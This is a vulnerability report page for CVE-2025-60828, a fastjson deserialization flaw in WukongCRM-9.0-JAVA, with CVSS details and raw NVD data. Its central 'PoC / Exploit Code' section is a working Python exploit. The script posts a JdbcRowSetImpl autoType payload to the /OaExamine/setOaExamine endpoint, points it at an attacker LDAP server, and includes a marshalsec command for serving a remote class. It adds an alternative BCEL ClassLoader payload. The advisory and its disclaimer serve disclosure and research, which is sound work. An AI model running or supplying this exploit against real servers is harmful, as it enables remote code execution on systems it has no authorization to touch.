Security Vulnerability Report
中文
CVE-2025-60828 CVSS 6.5 MEDIUM

CVE-2025-60828

Published: 2025-10-08 14:15:46
Last Modified: 2025-10-10 16:17:12
Source: [email protected]

Description

WukongCRM-9.0-JAVA was discovered to contain a fastjson deserialization vulnerability via the /OaExamine/setOaExamine interface.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:5kcrm:wukongcrm:9.0:*:*:*:*:*:*:* - VULNERABLE
WukongCRM-9.0-JAVA

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60828 PoC - WukongCRM-9.0-JAVA fastjson deserialization RCE # Attack vector: POST /OaExamine/setOaExamine # Target: WukongCRM-9.0-JAVA with vulnerable fastjson version import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target:8080" LDAP_URL = sys.argv[2] if len(sys.argv) > 2 else "ldap://attacker.com:1389/Exploit" # Step 1: Set up malicious LDAP/RMI server (using marshalsec or similar tool) # Run on attacker machine: java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker.com:8000/#Exploit" 1389 # Step 2: Craft malicious JSON payload exploiting fastjson autoType payload = { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": LDAP_URL, "autoCommit": True } # Step 3: Send exploit to vulnerable endpoint endpoint = f"{TARGET_URL}/OaExamine/setOaExamine" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) print(f"[+] Exploit sent to {endpoint}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") if response.status_code == 200: print("[+] Target appears vulnerable!") except Exception as e: print(f"[-] Error: {e}") # Alternative payload using BasicDataSource (Tomcat JDBC pool) alternative_payload = { "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassName": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": { "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "initialSize": 1 }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60828", "sourceIdentifier": "[email protected]", "published": "2025-10-08T14:15:45.617", "lastModified": "2025-10-10T16:17:11.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WukongCRM-9.0-JAVA was discovered to contain a fastjson deserialization vulnerability via the /OaExamine/setOaExamine interface."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:5kcrm:wukongcrm:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "40083370-EE93-4F63-811E-EBC970579592"}]}]}], "references": [{"url": "https://gist.github.com/ChangeYourWay/424478421d6a78d1f87d324cddcbfd59", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/ChangeYourWay/post/blob/main/WukongCRM-9.0-JAVA.md", "source": "[email protected]", "tags": ["Exploit"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.